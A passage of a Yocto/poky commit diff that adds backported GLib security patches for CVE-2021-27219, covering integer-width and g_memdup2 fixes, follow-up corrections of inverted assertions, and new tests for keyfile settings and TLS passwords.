+33,7 @@ + #include "gfilemonitor.h" + #include "gsimplepermission.h" + #include "gsettingsbackendinternal.h" ++#include "gstrfuncsprivate.h" + #include "giomodule-priv.h" + #include "gportalsupport.h" + +@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb, + gchar **group, + gchar **basename) + { +- gint key_len = strlen (key); +- gint i; ++ gsize key_len = strlen (key); ++ const gchar *last_slash; + + if (key_len < kfsb->prefix_len || + memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0) +@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb, + key_len -= kfsb->prefix_len; + key += kfsb->prefix_len; + +- for (i = key_len; i >= 0; i--) +- if (key[i] == '/') +- break; ++ last_slash = strrchr (key, '/'); + + if (kfsb->root_group) + { + /* if a root_group was specified, make sure the user hasn't given + * a path that ghosts that group name + */ +- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0) ++ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0) + return FALSE; + } + else + { + /* if no root_group was given, ensure that the user gave a path */ +- if (i == -1) ++ if (last_slash == NULL) + return FALSE; + } + + if (group) + { +- if (i >= 0) ++ if (last_slash != NULL) + { +- *group = g_memdup (key, i + 1); +- (*group)[i] = '\0'; ++ *group = g_memdup2 (key, (last_slash - key) + 1); ++ (*group)[(last_slash - key)] = '\0'; + } + else + *group = g_strdup (kfsb->root_group); + } + + if (basename) +- *basename = g_memdup (key + i + 1, key_len - i); ++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); + + return TRUE; + } +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch new file mode 100644 index 0000000000..8efb7c720f --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch @@ -0,0 +1,100 @@ +From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 14:00:53 +0000 +Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?= + =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?= +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Don’t use an `int`, that’s potentially too small. In practical terms, +this is not a problem, since no socket address is going to be that big. + +By making these changes we can use `g_memdup2()` without warnings, +though. Fewer warnings is good. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gsocket.c | 16 ++++++++++------ + 1 file changed, 10 insertions(+), 6 deletions(-) + +--- a/gio/gsocket.c ++++ b/gio/gsocket.c +@@ -75,6 +75,7 @@ + #include "gcredentialsprivate.h" + #include "glibintl.h" + #include "gioprivate.h" ++#include "gstrfuncsprivate.h" + + #ifdef G_OS_WIN32 + /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */ +@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba + GError **error); + + static GSocketAddress * +-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len); ++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len); + + static gssize + g_socket_receive_message_with_timeout (GSocket *socket, +@@ -260,7 +261,7 @@ struct _GSocketPrivate + struct { + GSocketAddress *addr; + struct sockaddr *native; +- gint native_len; ++ gsize native_len; + guint64 last_used; + } recv_addr_cache[RECV_ADDR_CACHE_SIZE]; + }; +@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo + } + + static GSocketAddress * +-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len) ++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len) + { + GSocketAddress *saddr; + gint i; + guint64 oldest_time = G_MAXUINT64; + gint oldest_index = 0; + +- if (native_len <= 0) ++ if (native_len == 0) + return NULL; + + saddr = NULL; +@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str + { + GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr; + gpointer tmp_native = socket->priv->recv_addr_cache[i].native; +- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len; ++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len; + + if (!tmp) + continue; +@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str + g_free (socket->priv->recv_addr_cache[oldest_index].native); + } + +- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len); ++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len); + socket->priv->recv_addr_cache[oldest_index].native_len = native_len; + socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr); + socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time (); +@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G + /* do it */ + while (1) + { ++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */ ++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT); ++ + addrlen = sizeof addr; + if (address) + result = WSARecvFrom (socket->priv->fd, diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch new file mode 100644 index 0000000000..63fda0b600 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch @@ -0,0 +1,59 @@ +From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 14:07:39 +0000 +Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The public API `g_tls_password_set_value_full()` (and the vfunc it +invokes) can only accept a `gssize` length. Ensure that nul-terminated +strings passed to `g_tls_password_set_value()` can’t exceed that length. +Use `g_memdup2()` to avoid an overflow if they’re longer than +`G_MAXUINT` similarly. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gtlspassword.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c +index 1e437a7b6..dbcec41a8 100644 +--- a/gio/gtlspassword.c ++++ b/gio/gtlspassword.c +@@ -23,6 +23,7 @@ + #include "glibintl.h" + + #include "gioenumtypes.h" ++#include "gstrfuncsprivate.h" + #include "gtlspassword.h" + + #include +@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password, + g_return_if_fail (G_IS_TLS_PASSWORD (password)); + + if (length < 0) +- length = strlen ((gchar *)value); ++ { ++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */ ++ gsize length_unsigned = strlen ((gchar *) value); ++ g_return_if_fail (length_unsigned > G_MAXSSIZE); ++ length = (gssize) length_unsigned; ++ } + +- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free); ++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free); + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch new file mode 100644 index 0000000000..a620a49269 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch @@ -0,0 +1,63 @@ +From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 14:09:40 +0000 +Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that +nul-terminated strings passed to `g_io_channel_set_line_term()` can’t +exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()` +is due to be deprecated), but not to avoid a bug, since it’s also +limited to `G_MAXUINT`. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + glib/giochannel.c | 17 +++++++++++++---- + 1 file changed, 13 insertions(+), 4 deletions(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index c6a89d6e0..4dec20f77 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel, + const gchar *line_term, + gint length) + { ++ guint length_unsigned; ++ + g_return_if_fail (channel != NULL); + g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */ + + if (line_term == NULL) +- length = 0; +- else if (length < 0) +- length = strlen (line_term); ++ length_unsigned = 0; ++ else if (length >= 0) ++ length_unsigned = (guint) length; ++ else ++ { ++ /* FIXME: We’re constrained by line_term_len being a guint here */ ++ gsize length_size = strlen (line_term); ++ g_return_if_fail (length_size > G_MAXUINT); ++ length_unsigned = (guint) length_size; ++ } + + g_free (channel->line_term); +- channel->line_term = line_term ? g_memdup (line_term, length) : NULL; ++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL; + channel->line_term_len = length; + } + +-- +GitLab + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch new file mode 100644 index 0000000000..3047062f54 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch @@ -0,0 +1,36 @@ +From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001 +From: "Jan Alexander Steffens (heftig)" +Date: Sun, 7 Feb 2021 23:32:40 +0100 +Subject: [PATCH 1/5] giochannel: Fix length_size bounds check + +The inverted condition is an obvious error introduced by ecdf91400e9a. + +Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323 + +(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + glib/giochannel.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index 4dec20f77..c3f3102ff 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel, + { + /* FIXME: We’re constrained by line_term_len being a guint here */ + gsize length_size = strlen (line_term); +- g_return_if_fail (length_size > G_MAXUINT); ++ g_return_if_fail (length_size <= G_MAXUINT); + length_unsigned = (guint) length_size; + } + +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch new file mode 100644 index 0000000000..2ba26075df --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch @@ -0,0 +1,38 @@ +From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001 +From: Simon McVittie +Date: Mon, 8 Feb 2021 10:34:50 +0000 +Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in + GIOChannel struct + +Adding test coverage indicated that this was another bug in 0cc11f74. + +Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings" +Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323 +Signed-off-by: Simon McVittie +(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + glib/giochannel.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index c3f3102ff..19bb06ba6 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel, + + g_free (channel->line_term); + channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL; +- channel->line_term_len = length; ++ channel->line_term_len = length_unsigned; + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch new file mode 100644 index 0000000000..2c388b4bbb --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch @@ -0,0 +1,38 @@ +From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001 +From: Simon McVittie +Date: Mon, 8 Feb 2021 10:04:48 +0000 +Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion + +The intention here was to assert that the length of the password fits +in a gssize. Passwords more than half the size of virtual memory are +probably excessive. + +Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords" +Signed-off-by: Simon McVittie +(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gtlspassword.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c +index dbcec41a8..bd86a6dfe 100644 +--- a/gio/gtlspassword.c ++++ b/gio/gtlspassword.c +@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password, + { + /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */ + gsize length_unsigned = strlen ((gchar *) value); +- g_return_if_fail (length_unsigned > G_MAXSSIZE); ++ g_return_if_fail (length_unsigned <= G_MAXSSIZE); + length = (gssize) length_unsigned; + } + +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch new file mode 100644 index 0000000000..356e986fe0 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch @@ -0,0 +1,100 @@ +From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001 +From: Simon McVittie +Date: Mon, 8 Feb 2021 10:22:39 +0000 +Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to + set the password + +Signed-off-by: Simon McVittie +(cherry picked from commit df4501316ca3903072400504a5ea76498db19538) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++ + 1 file changed, 55 insertions(+) + +diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c +index 4f0737d7e..5661e8e0d 100644 +--- a/gio/tests/tls-interaction.c ++++ b/gio/tests/tls-interaction.c +@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction, + } + + ++/* Return a copy of @str that is allocated in a silly way, to exercise ++ * custom free-functions. The returned pointer points to a copy of @str ++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */ ++static guchar * ++special_dup (const char *str) ++{ ++ GString *buf = g_string_new ("BEFORE"); ++ guchar *ret; ++ ++ g_string_append_c (buf, '\0'); ++ g_string_append (buf, str); ++ g_string_append_c (buf, '\0'); ++ g_string_append (buf, "AFTER"); ++ ret = (guchar *) g_string_free (buf, FALSE); ++ return ret + strlen ("BEFORE") + 1; ++} ++ ++ ++/* Free a copy of @str that was made with special_dup(), after asserting ++ * that it has not been corrupted. */ ++static void ++special_free (gpointer p) ++{ ++ gchar *s = p; ++ gchar *buf = s - strlen ("BEFORE") - 1; ++ ++ g_assert_cmpstr (buf, ==, "BEFORE"); ++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER"); ++ g_free (buf); ++} ++ ++ + static GTlsInteractionResult + test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + GTlsPassword *password, +@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + GError **error) + { + TestInteraction *self; ++ const guchar *value; ++ gsize len; + + g_assert (TEST_IS_INTERACTION (interaction)); + self = TEST_INTERACTION (interaction); +@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + g_assert (error != NULL); + g_assert (*error == NULL); + ++ /* Exercise different ways to set the value */ ++ g_tls_password_set_value (password, (const guchar *) "foo", 4); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "foo", 4); ++ ++ g_tls_password_set_value (password, (const guchar *) "bar", -1); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "bar", 3); ++ ++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "baa", 4); ++ ++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "baz", 3); ++ + /* Don't do this in real life. Include a null terminator for testing */ + g_tls_password_set_value (password, (const guchar *)"the password", 13); + return G_TLS_INTERACTION_HANDLED; +-- +GitLab + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch new file mode 100644 index 0000000000..dd43689aae --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch @@ -0,0 +1,49 @@ +From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 10 Feb 2021 21:16:39 +0000 +Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group + is unset + +Fix an effective regression in commit +7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when +`convert_path()` is called with a `key` which contains no slashes. In +that case, the `key` is entirely the `basename`. + +Prior to commit 7781a9cb, the code worked through a fluke of `i == -1` +cancelling out with the various additions in the `g_memdup()` call, and +effectively resulting in `g_strdup (key)`. + +Spotted by Guido Berhoerster. + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gkeyfilesettingsbackend.c | 7 ++++++- + 1 file changed, 6 insertions(+), 1 deletion(-) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index 25b057672..861c3a661 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb, + } + + if (basename) +- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); ++ { ++ if (last_slash != NULL) ++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); ++ else ++ *basename = g_strdup (key); ++ } + + return TRUE; + } +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch new file mode 100644 index 0000000000..04503641c3 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch @@ -0,0 +1,43 @@ +From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 10 Feb 2021 21:19:30 +0000 +Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group + names + +These should never have been allowed; they will result in precondition +failures from the `GKeyFile` later on in the code. + +A test will be added for this shortly. + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gkeyfilesettingsbackend.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index 861c3a661..de216e615 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb, + + last_slash = strrchr (key, '/'); + ++ /* Disallow empty group names or key names */ ++ if (key_len == 0 || ++ (last_slash != NULL && ++ (*(last_slash + 1) == '\0' || ++ last_slash == key))) ++ return FALSE; ++ + if (kfsb->root_group) + { + /* if a root_group was specified, make sure the user hasn't given +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch new file mode 100644 index 0000000000..65f59287a8 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch @@ -0,0 +1,232 @@ +Backport of: + +From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Wed, 10 Feb 2021 21:21:36 +0000 +Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile + backend + +This tests the two recent commits. + +Signed-off-by: Philip Withnall + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod + +--- + gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++- + 1 file changed, 169 insertions(+), 1 deletion(-) + +--- a/gio/tests/gsettings.c ++++ b/gio/tests/gsettings.c +@@ -1,3 +1,4 @@ ++#include + #include + #include + #include +@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con + (*b) = TRUE; + } + ++typedef struct ++{ ++ const gchar *path; ++ const gchar *root_group; ++ const gchar *keyfile_group; ++ const gchar *root_path; ++} KeyfileTestData; ++ + /* + * Test that using a keyfile works + */ +@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture, + g_free (str); + + g_settings_set (settings, "farewell", "s", "cheerio"); +- ++ ++ /* Check that empty keys/groups are not allowed. */ ++ g_assert_false (g_settings_is_writable (settings, "")); ++ g_assert_false (g_settings_is_writable (settings, "/")); ++ + /* When executing as root, changing the mode of the keyfile will have + * no effect on the writability of the settings. + */ +@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture, + g_free (keyfile_path); + } + ++/* ++ * Test that using a keyfile works with a schema with no path set. ++ */ ++static void ++test_keyfile_no_path (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ const KeyfileTestData *test_data = user_data; ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ GKeyFile *keyfile; ++ gboolean writable; ++ gchar *key = NULL; ++ GError *error = NULL; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path); ++ g_object_unref (kf_backend); ++ ++ g_settings_reset (settings, "test-boolean"); ++ g_assert_true (g_settings_get_boolean (settings, "test-boolean")); ++ ++ writable = g_settings_is_writable (settings, "test-boolean"); ++ g_assert_true (writable); ++ g_settings_set (settings, "test-boolean", "b", FALSE); ++ ++ g_assert_false (g_settings_get_boolean (settings, "test-boolean")); ++ ++ g_settings_delay (settings); ++ g_settings_set (settings, "test-boolean", "b", TRUE); ++ g_settings_apply (settings); ++ ++ keyfile = g_key_file_new (); ++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL)); ++ ++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL)); ++ ++ g_key_file_free (keyfile); ++ ++ g_settings_reset (settings, "test-boolean"); ++ g_settings_apply (settings); ++ keyfile = g_key_file_new (); ++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL)); ++ ++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error)); ++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND); ++ g_clear_error (&error); ++ ++ /* Check that empty keys/groups are not allowed. */ ++ g_assert_false (g_settings_is_writable (settings, "")); ++ g_assert_false (g_settings_is_writable (settings, "/")); ++ ++ /* Keys which ghost the root group name are not allowed. This can only be ++ * tested when the path is `/` as otherwise it acts as a prefix and prevents ++ * any ghosting. */ ++ if (g_str_equal (test_data->path, "/")) ++ { ++ key = g_strdup_printf ("%s/%s", test_data->root_group, ""); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ ++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/"); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ ++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean"); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ } ++ ++ g_key_file_free (keyfile); ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. */ ++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0); ++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ ++/* ++ * Test that a keyfile rejects writes to keys outside its root path. ++ */ ++static void ++test_keyfile_outside_root_path (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root"); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/"); ++ g_object_unref (kf_backend); ++ ++ g_assert_false (g_settings_is_writable (settings, "test-boolean")); ++ ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so ++ * don’t error on failure. */ ++ g_remove (store_path); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ ++/* ++ * Test that a keyfile rejects writes to keys in the root if no root group is set. ++ */ ++static void ++test_keyfile_no_root_group (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/"); ++ g_object_unref (kf_backend); ++ ++ g_assert_false (g_settings_is_writable (settings, "test-boolean")); ++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean")); ++ ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so ++ * don’t error on failure. */ ++ g_remove (store_path); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ + /* Test that getting child schemas works + */ + static void +@@ -2844,6 +3000,14 @@ main (int argc, char *argv[]) 